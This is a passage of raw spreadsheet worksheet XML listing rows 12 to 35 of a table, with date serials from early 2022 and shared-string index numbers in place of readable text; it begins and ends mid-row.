      <c r="G12" s="3" t="s">
        <v>146</v>
      </c>
      <c r="H12" s="3" t="s">
        <v>147</v>
      </c>
      <c r="I12" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J12" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K12" s="3" t="s">
        <v>148</v>
      </c>
      <c r="L12" s="4" t="s">
        <v>149</v>
      </c>
      <c r="M12" s="4" t="s">
        <v>150</v>
      </c>
      <c r="N12" s="3" t="s">
        <v>151</v>
      </c>
      <c r="O12" s="4" t="s">
        <v>152</v>
      </c>
      <c r="P12" s="11" t="s">
        <v>153</v>
      </c>
      <c r="Q12" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R12" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S12" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T12" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="13" ht="63.0" customHeight="1">
      <c r="A13" s="6">
        <v>44648.0</v>
      </c>
      <c r="B13" s="14">
        <v>44648.0</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>154</v>
      </c>
      <c r="D13" s="3" t="s">
        <v>48</v>
      </c>
      <c r="E13" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>155</v>
      </c>
      <c r="G13" s="3" t="s">
        <v>50</v>
      </c>
      <c r="H13" s="3" t="s">
        <v>51</v>
      </c>
      <c r="I13" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J13" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K13" s="3" t="s">
        <v>54</v>
      </c>
      <c r="L13" s="4" t="s">
        <v>156</v>
      </c>
      <c r="M13" s="4" t="s">
        <v>157</v>
      </c>
      <c r="N13" s="3" t="s">
        <v>158</v>
      </c>
      <c r="O13" s="4" t="s">
        <v>159</v>
      </c>
      <c r="P13" s="7" t="s">
        <v>160</v>
      </c>
      <c r="Q13" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R13" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S13" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T13" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="14" ht="78.75" customHeight="1">
      <c r="A14" s="6">
        <v>44643.0</v>
      </c>
      <c r="B14" s="6">
        <v>44641.0</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>161</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>162</v>
      </c>
      <c r="E14" s="4" t="s">
        <v>163</v>
      </c>
      <c r="F14" s="4" t="s">
        <v>164</v>
      </c>
      <c r="G14" s="3" t="s">
        <v>165</v>
      </c>
      <c r="H14" s="3" t="s">
        <v>166</v>
      </c>
      <c r="I14" s="3" t="s">
        <v>26</v>
      </c>
      <c r="J14" s="3" t="s">
        <v>27</v>
      </c>
      <c r="K14" s="3" t="s">
        <v>64</v>
      </c>
      <c r="L14" s="4" t="s">
        <v>167</v>
      </c>
      <c r="M14" s="4" t="s">
        <v>168</v>
      </c>
      <c r="N14" s="3" t="s">
        <v>67</v>
      </c>
      <c r="O14" s="4" t="s">
        <v>169</v>
      </c>
      <c r="P14" s="7" t="s">
        <v>170</v>
      </c>
      <c r="Q14" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R14" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S14" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T14" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="15" ht="48.75" customHeight="1">
      <c r="A15" s="6">
        <v>44642.0</v>
      </c>
      <c r="B15" s="6">
        <v>44642.0</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>171</v>
      </c>
      <c r="D15" s="3" t="s">
        <v>172</v>
      </c>
      <c r="E15" s="4" t="s">
        <v>163</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>173</v>
      </c>
      <c r="G15" s="3" t="s">
        <v>174</v>
      </c>
      <c r="H15" s="3" t="s">
        <v>175</v>
      </c>
      <c r="I15" s="3" t="s">
        <v>116</v>
      </c>
      <c r="J15" s="3" t="s">
        <v>117</v>
      </c>
      <c r="K15" s="3" t="s">
        <v>176</v>
      </c>
      <c r="L15" s="4" t="s">
        <v>177</v>
      </c>
      <c r="M15" s="4" t="s">
        <v>178</v>
      </c>
      <c r="N15" s="3" t="s">
        <v>179</v>
      </c>
      <c r="O15" s="4" t="s">
        <v>180</v>
      </c>
      <c r="P15" s="7" t="s">
        <v>181</v>
      </c>
      <c r="Q15" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R15" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S15" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T15" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="6">
        <v>44642.0</v>
      </c>
      <c r="B16" s="14">
        <v>44637.0</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>182</v>
      </c>
      <c r="D16" s="3" t="s">
        <v>183</v>
      </c>
      <c r="E16" s="4" t="s">
        <v>163</v>
      </c>
      <c r="F16" s="4" t="s">
        <v>184</v>
      </c>
      <c r="G16" s="3" t="s">
        <v>185</v>
      </c>
      <c r="H16" s="3" t="s">
        <v>186</v>
      </c>
      <c r="I16" s="3" t="s">
        <v>187</v>
      </c>
      <c r="J16" s="3" t="s">
        <v>188</v>
      </c>
      <c r="K16" s="3" t="s">
        <v>189</v>
      </c>
      <c r="L16" s="3" t="s">
        <v>35</v>
      </c>
      <c r="M16" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N16" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O16" s="4" t="s">
        <v>190</v>
      </c>
      <c r="P16" s="11" t="s">
        <v>191</v>
      </c>
      <c r="Q16" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R16" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S16" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T16" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="17" ht="52.5" customHeight="1">
      <c r="A17" s="6">
        <v>44638.0</v>
      </c>
      <c r="B17" s="6">
        <v>44638.0</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>192</v>
      </c>
      <c r="D17" s="3" t="s">
        <v>193</v>
      </c>
      <c r="E17" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>194</v>
      </c>
      <c r="G17" s="3" t="s">
        <v>195</v>
      </c>
      <c r="H17" s="3" t="s">
        <v>196</v>
      </c>
      <c r="I17" s="3" t="s">
        <v>26</v>
      </c>
      <c r="J17" s="3" t="s">
        <v>27</v>
      </c>
      <c r="K17" s="3" t="s">
        <v>197</v>
      </c>
      <c r="L17" s="4" t="s">
        <v>198</v>
      </c>
      <c r="M17" s="4" t="s">
        <v>199</v>
      </c>
      <c r="N17" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O17" s="4" t="s">
        <v>200</v>
      </c>
      <c r="P17" s="11" t="s">
        <v>201</v>
      </c>
      <c r="Q17" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R17" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S17" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T17" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="18" ht="48.0" customHeight="1">
      <c r="A18" s="6">
        <v>44637.0</v>
      </c>
      <c r="B18" s="6">
        <v>44637.0</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>202</v>
      </c>
      <c r="D18" s="3" t="s">
        <v>203</v>
      </c>
      <c r="E18" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F18" s="4" t="s">
        <v>204</v>
      </c>
      <c r="G18" s="3" t="s">
        <v>205</v>
      </c>
      <c r="H18" s="3" t="s">
        <v>206</v>
      </c>
      <c r="I18" s="3" t="s">
        <v>116</v>
      </c>
      <c r="J18" s="3" t="s">
        <v>117</v>
      </c>
      <c r="K18" s="3" t="s">
        <v>207</v>
      </c>
      <c r="L18" s="4" t="s">
        <v>208</v>
      </c>
      <c r="M18" s="4" t="s">
        <v>209</v>
      </c>
      <c r="N18" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O18" s="4" t="s">
        <v>210</v>
      </c>
      <c r="P18" s="11" t="s">
        <v>211</v>
      </c>
      <c r="Q18" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R18" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S18" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T18" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="6">
        <v>44687.0</v>
      </c>
      <c r="B19" s="6">
        <v>44687.0</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>212</v>
      </c>
      <c r="D19" s="3" t="s">
        <v>213</v>
      </c>
      <c r="E19" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F19" s="4" t="s">
        <v>214</v>
      </c>
      <c r="G19" s="3" t="s">
        <v>215</v>
      </c>
      <c r="H19" s="3" t="s">
        <v>216</v>
      </c>
      <c r="I19" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J19" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K19" s="3" t="s">
        <v>89</v>
      </c>
      <c r="L19" s="4" t="s">
        <v>217</v>
      </c>
      <c r="M19" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N19" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O19" s="4" t="s">
        <v>218</v>
      </c>
      <c r="P19" s="7" t="s">
        <v>219</v>
      </c>
      <c r="Q19" s="3" t="s">
        <v>132</v>
      </c>
      <c r="R19" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S19" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T19" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="20" ht="62.25" customHeight="1">
      <c r="A20" s="6">
        <v>44688.0</v>
      </c>
      <c r="B20" s="6">
        <v>44687.0</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>220</v>
      </c>
      <c r="D20" s="3" t="s">
        <v>221</v>
      </c>
      <c r="E20" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F20" s="4" t="s">
        <v>222</v>
      </c>
      <c r="G20" s="3" t="s">
        <v>223</v>
      </c>
      <c r="H20" s="3" t="s">
        <v>51</v>
      </c>
      <c r="I20" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J20" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K20" s="3" t="s">
        <v>89</v>
      </c>
      <c r="L20" s="4" t="s">
        <v>224</v>
      </c>
      <c r="M20" s="4" t="s">
        <v>225</v>
      </c>
      <c r="N20" s="3" t="s">
        <v>226</v>
      </c>
      <c r="O20" s="4" t="s">
        <v>227</v>
      </c>
      <c r="P20" s="7" t="s">
        <v>228</v>
      </c>
      <c r="Q20" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R20" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S20" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T20" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="21" ht="54.75" customHeight="1">
      <c r="A21" s="6">
        <v>44636.0</v>
      </c>
      <c r="B21" s="6">
        <v>44627.0</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>229</v>
      </c>
      <c r="D21" s="3" t="s">
        <v>213</v>
      </c>
      <c r="E21" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F21" s="17" t="s">
        <v>230</v>
      </c>
      <c r="G21" s="3" t="s">
        <v>231</v>
      </c>
      <c r="H21" s="3" t="s">
        <v>35</v>
      </c>
      <c r="I21" s="12" t="s">
        <v>127</v>
      </c>
      <c r="J21" s="3" t="s">
        <v>232</v>
      </c>
      <c r="K21" s="3" t="s">
        <v>89</v>
      </c>
      <c r="L21" s="4" t="s">
        <v>233</v>
      </c>
      <c r="M21" s="9"/>
      <c r="N21" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O21" s="4" t="s">
        <v>234</v>
      </c>
      <c r="P21" s="7" t="s">
        <v>235</v>
      </c>
      <c r="Q21" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R21" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S21" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T21" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="22" ht="39.75" customHeight="1">
      <c r="A22" s="6">
        <v>44631.0</v>
      </c>
      <c r="B22" s="14">
        <v>44630.0</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>236</v>
      </c>
      <c r="D22" s="3" t="s">
        <v>48</v>
      </c>
      <c r="E22" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F22" s="4" t="s">
        <v>237</v>
      </c>
      <c r="G22" s="3" t="s">
        <v>238</v>
      </c>
      <c r="H22" s="3" t="s">
        <v>239</v>
      </c>
      <c r="I22" s="12" t="s">
        <v>240</v>
      </c>
      <c r="J22" s="3" t="s">
        <v>241</v>
      </c>
      <c r="K22" s="3" t="s">
        <v>242</v>
      </c>
      <c r="L22" s="4" t="s">
        <v>243</v>
      </c>
      <c r="M22" s="4" t="s">
        <v>244</v>
      </c>
      <c r="N22" s="3" t="s">
        <v>245</v>
      </c>
      <c r="O22" s="4" t="s">
        <v>246</v>
      </c>
      <c r="P22" s="7" t="s">
        <v>247</v>
      </c>
      <c r="Q22" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R22" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S22" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T22" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="23" ht="69.0" customHeight="1">
      <c r="A23" s="6">
        <v>44629.0</v>
      </c>
      <c r="B23" s="6">
        <v>44629.0</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>248</v>
      </c>
      <c r="D23" s="3" t="s">
        <v>144</v>
      </c>
      <c r="E23" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F23" s="4" t="s">
        <v>249</v>
      </c>
      <c r="G23" s="3" t="s">
        <v>250</v>
      </c>
      <c r="H23" s="3" t="s">
        <v>51</v>
      </c>
      <c r="I23" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J23" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K23" s="3" t="s">
        <v>148</v>
      </c>
      <c r="L23" s="4" t="s">
        <v>251</v>
      </c>
      <c r="M23" s="4" t="s">
        <v>252</v>
      </c>
      <c r="N23" s="3" t="s">
        <v>253</v>
      </c>
      <c r="O23" s="4" t="s">
        <v>254</v>
      </c>
      <c r="P23" s="7" t="s">
        <v>255</v>
      </c>
      <c r="Q23" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R23" s="15" t="s">
        <v>256</v>
      </c>
      <c r="S23" s="3" t="s">
        <v>257</v>
      </c>
      <c r="T23" s="5" t="s">
        <v>258</v>
      </c>
    </row>
    <row r="24" ht="67.5" customHeight="1">
      <c r="A24" s="6">
        <v>44627.0</v>
      </c>
      <c r="B24" s="6">
        <v>44627.0</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>259</v>
      </c>
      <c r="D24" s="3" t="s">
        <v>162</v>
      </c>
      <c r="E24" s="4" t="s">
        <v>163</v>
      </c>
      <c r="F24" s="4" t="s">
        <v>260</v>
      </c>
      <c r="G24" s="3" t="s">
        <v>261</v>
      </c>
      <c r="H24" s="3" t="s">
        <v>262</v>
      </c>
      <c r="I24" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J24" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K24" s="3" t="s">
        <v>263</v>
      </c>
      <c r="L24" s="4" t="s">
        <v>264</v>
      </c>
      <c r="M24" s="4" t="s">
        <v>265</v>
      </c>
      <c r="N24" s="3" t="s">
        <v>266</v>
      </c>
      <c r="O24" s="4" t="s">
        <v>267</v>
      </c>
      <c r="P24" s="11" t="s">
        <v>268</v>
      </c>
      <c r="Q24" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R24" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S24" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T24" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="25" ht="58.5" customHeight="1">
      <c r="A25" s="6">
        <v>44614.0</v>
      </c>
      <c r="B25" s="6">
        <v>44614.0</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>35</v>
      </c>
      <c r="D25" s="3" t="s">
        <v>35</v>
      </c>
      <c r="E25" s="4" t="s">
        <v>163</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>35</v>
      </c>
      <c r="G25" s="3" t="s">
        <v>269</v>
      </c>
      <c r="H25" s="3" t="s">
        <v>35</v>
      </c>
      <c r="I25" s="3" t="s">
        <v>270</v>
      </c>
      <c r="J25" s="3" t="s">
        <v>271</v>
      </c>
      <c r="K25" s="3" t="s">
        <v>272</v>
      </c>
      <c r="L25" s="3" t="s">
        <v>35</v>
      </c>
      <c r="M25" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N25" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O25" s="4" t="s">
        <v>273</v>
      </c>
      <c r="P25" s="7" t="s">
        <v>274</v>
      </c>
      <c r="Q25" s="3" t="s">
        <v>275</v>
      </c>
      <c r="R25" s="15" t="s">
        <v>276</v>
      </c>
      <c r="S25" s="3" t="s">
        <v>277</v>
      </c>
      <c r="T25" s="5" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="26" ht="59.25" customHeight="1">
      <c r="A26" s="6">
        <v>44614.0</v>
      </c>
      <c r="B26" s="6">
        <v>44614.0</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>35</v>
      </c>
      <c r="D26" s="3" t="s">
        <v>35</v>
      </c>
      <c r="E26" s="4" t="s">
        <v>163</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>35</v>
      </c>
      <c r="G26" s="3" t="s">
        <v>35</v>
      </c>
      <c r="H26" s="3" t="s">
        <v>35</v>
      </c>
      <c r="I26" s="3" t="s">
        <v>270</v>
      </c>
      <c r="J26" s="3" t="s">
        <v>271</v>
      </c>
      <c r="K26" s="3" t="s">
        <v>279</v>
      </c>
      <c r="L26" s="3" t="s">
        <v>35</v>
      </c>
      <c r="M26" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N26" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O26" s="4" t="s">
        <v>280</v>
      </c>
      <c r="P26" s="11" t="s">
        <v>274</v>
      </c>
      <c r="Q26" s="3" t="s">
        <v>275</v>
      </c>
      <c r="R26" s="15" t="s">
        <v>281</v>
      </c>
      <c r="S26" s="3" t="s">
        <v>282</v>
      </c>
      <c r="T26" s="5" t="s">
        <v>283</v>
      </c>
    </row>
    <row r="27" ht="53.25" customHeight="1">
      <c r="A27" s="6">
        <v>44613.0</v>
      </c>
      <c r="B27" s="6">
        <v>44608.0</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>284</v>
      </c>
      <c r="D27" s="3" t="s">
        <v>285</v>
      </c>
      <c r="E27" s="4" t="s">
        <v>286</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>194</v>
      </c>
      <c r="G27" s="3" t="s">
        <v>287</v>
      </c>
      <c r="H27" s="3" t="s">
        <v>288</v>
      </c>
      <c r="I27" s="16" t="s">
        <v>289</v>
      </c>
      <c r="J27" s="3" t="s">
        <v>290</v>
      </c>
      <c r="K27" s="3" t="s">
        <v>291</v>
      </c>
      <c r="L27" s="4" t="s">
        <v>292</v>
      </c>
      <c r="M27" s="4" t="s">
        <v>293</v>
      </c>
      <c r="N27" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O27" s="4" t="s">
        <v>294</v>
      </c>
      <c r="P27" s="7" t="s">
        <v>295</v>
      </c>
      <c r="Q27" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R27" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S27" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T27" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="6">
        <v>44610.0</v>
      </c>
      <c r="B28" s="6">
        <v>44607.0</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>35</v>
      </c>
      <c r="D28" s="3" t="s">
        <v>296</v>
      </c>
      <c r="E28" s="4" t="s">
        <v>38</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>35</v>
      </c>
      <c r="G28" s="3" t="s">
        <v>297</v>
      </c>
      <c r="H28" s="3" t="s">
        <v>35</v>
      </c>
      <c r="I28" s="3" t="s">
        <v>40</v>
      </c>
      <c r="J28" s="3" t="s">
        <v>41</v>
      </c>
      <c r="K28" s="3" t="s">
        <v>42</v>
      </c>
      <c r="L28" s="3" t="s">
        <v>35</v>
      </c>
      <c r="M28" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N28" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O28" s="4" t="s">
        <v>298</v>
      </c>
      <c r="P28" s="7" t="s">
        <v>299</v>
      </c>
      <c r="Q28" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R28" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S28" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T28" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="6">
        <v>44610.0</v>
      </c>
      <c r="B29" s="6">
        <v>44607.0</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>35</v>
      </c>
      <c r="D29" s="3" t="s">
        <v>296</v>
      </c>
      <c r="E29" s="4" t="s">
        <v>38</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>35</v>
      </c>
      <c r="G29" s="3" t="s">
        <v>35</v>
      </c>
      <c r="H29" s="3" t="s">
        <v>35</v>
      </c>
      <c r="I29" s="3" t="s">
        <v>40</v>
      </c>
      <c r="J29" s="3" t="s">
        <v>41</v>
      </c>
      <c r="K29" s="3" t="s">
        <v>42</v>
      </c>
      <c r="L29" s="3" t="s">
        <v>35</v>
      </c>
      <c r="M29" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N29" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O29" s="4" t="s">
        <v>300</v>
      </c>
      <c r="P29" s="18" t="s">
        <v>301</v>
      </c>
      <c r="Q29" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R29" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S29" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T29" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="6">
        <v>44610.0</v>
      </c>
      <c r="B30" s="6">
        <v>44607.0</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>35</v>
      </c>
      <c r="D30" s="3" t="s">
        <v>296</v>
      </c>
      <c r="E30" s="4" t="s">
        <v>302</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>35</v>
      </c>
      <c r="G30" s="3" t="s">
        <v>303</v>
      </c>
      <c r="H30" s="3" t="s">
        <v>35</v>
      </c>
      <c r="I30" s="3" t="s">
        <v>304</v>
      </c>
      <c r="J30" s="3" t="s">
        <v>305</v>
      </c>
      <c r="K30" s="3" t="s">
        <v>306</v>
      </c>
      <c r="L30" s="4" t="s">
        <v>307</v>
      </c>
      <c r="M30" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N30" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O30" s="4" t="s">
        <v>308</v>
      </c>
      <c r="P30" s="18" t="s">
        <v>309</v>
      </c>
      <c r="Q30" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R30" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S30" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T30" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="31" ht="41.25" customHeight="1">
      <c r="A31" s="6">
        <v>44693.0</v>
      </c>
      <c r="B31" s="6">
        <v>44693.0</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>310</v>
      </c>
      <c r="D31" s="3" t="s">
        <v>112</v>
      </c>
      <c r="E31" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F31" s="4" t="s">
        <v>311</v>
      </c>
      <c r="G31" s="3" t="s">
        <v>312</v>
      </c>
      <c r="H31" s="3" t="s">
        <v>313</v>
      </c>
      <c r="I31" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J31" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K31" s="3" t="s">
        <v>314</v>
      </c>
      <c r="L31" s="4" t="s">
        <v>315</v>
      </c>
      <c r="M31" s="4" t="s">
        <v>316</v>
      </c>
      <c r="N31" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O31" s="4" t="s">
        <v>317</v>
      </c>
      <c r="P31" s="7" t="s">
        <v>318</v>
      </c>
      <c r="Q31" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R31" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S31" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T31" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="6">
        <v>44594.0</v>
      </c>
      <c r="B32" s="6">
        <v>44593.0</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>319</v>
      </c>
      <c r="D32" s="3" t="s">
        <v>48</v>
      </c>
      <c r="E32" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F32" s="4" t="s">
        <v>320</v>
      </c>
      <c r="G32" s="3" t="s">
        <v>321</v>
      </c>
      <c r="H32" s="3" t="s">
        <v>322</v>
      </c>
      <c r="I32" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J32" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K32" s="3" t="s">
        <v>89</v>
      </c>
      <c r="L32" s="4" t="s">
        <v>323</v>
      </c>
      <c r="M32" s="4" t="s">
        <v>324</v>
      </c>
      <c r="N32" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O32" s="4" t="s">
        <v>325</v>
      </c>
      <c r="P32" s="7" t="s">
        <v>326</v>
      </c>
      <c r="Q32" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R32" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S32" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T32" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="6">
        <v>44593.0</v>
      </c>
      <c r="B33" s="6">
        <v>44588.0</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>327</v>
      </c>
      <c r="D33" s="3" t="s">
        <v>112</v>
      </c>
      <c r="E33" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F33" s="4" t="s">
        <v>328</v>
      </c>
      <c r="G33" s="3" t="s">
        <v>329</v>
      </c>
      <c r="H33" s="3" t="s">
        <v>330</v>
      </c>
      <c r="I33" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J33" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K33" s="3" t="s">
        <v>176</v>
      </c>
      <c r="L33" s="4" t="s">
        <v>331</v>
      </c>
      <c r="M33" s="4" t="s">
        <v>332</v>
      </c>
      <c r="N33" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O33" s="4" t="s">
        <v>333</v>
      </c>
      <c r="P33" s="7" t="s">
        <v>334</v>
      </c>
      <c r="Q33" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R33" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S33" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T33" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="34" ht="49.5" customHeight="1">
      <c r="A34" s="6">
        <v>44592.0</v>
      </c>
      <c r="B34" s="6">
        <v>44589.0</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>335</v>
      </c>
      <c r="D34" s="3" t="s">
        <v>48</v>
      </c>
      <c r="E34" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F34" s="4" t="s">
        <v>35</v>
      </c>
      <c r="G34" s="3" t="s">
        <v>336</v>
      </c>
      <c r="H34" s="3" t="s">
        <v>32</v>
      </c>
      <c r="I34" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J34" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K34" s="3" t="s">
        <v>89</v>
      </c>
      <c r="L34" s="4" t="s">
        <v>337</v>
      </c>
      <c r="M34" s="4" t="s">
        <v>338</v>
      </c>
      <c r="N34" s="3" t="s">
        <v>339</v>
      </c>
      <c r="O34" s="4" t="s">
        <v>340</v>
      </c>
      <c r="P34" s="11" t="s">
        <v>341</v>
      </c>
      <c r="Q34" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R34" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S34" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T34" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="6">
        <v>44589.0</v>
      </c>
      <c r="B35" s="6">
        <v>44589.0</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>342</v>
      </c>
      <c r="D35" s="3" t="s">
        <v>343</v>
      </c>
      <c r="E35" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F35" s="4" t="s">
        <v>344</v>
      </c>
      <c r="G35" s="3" t="s">
        <v>345</v>
      </c>
      <c r="H35" s="3" t="s">
        <v>346</v>
      </c>
      <c r="I35" s="16" t="s">
        <v>347</v>
      </c>
      <c r="J35" s="3" t="s">
        <v>348</v>
      </c>
      <c r="K35" s="3" t="s">
        <v>291</v>
      </c>
      <c r="L35" s="4" t="s">
        <v>349</v>
      </c>
      <c r="M35" s="4" t="s">
        <v>350</v>
      </c>
      <c r="N35" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O35" s="4" t="s">
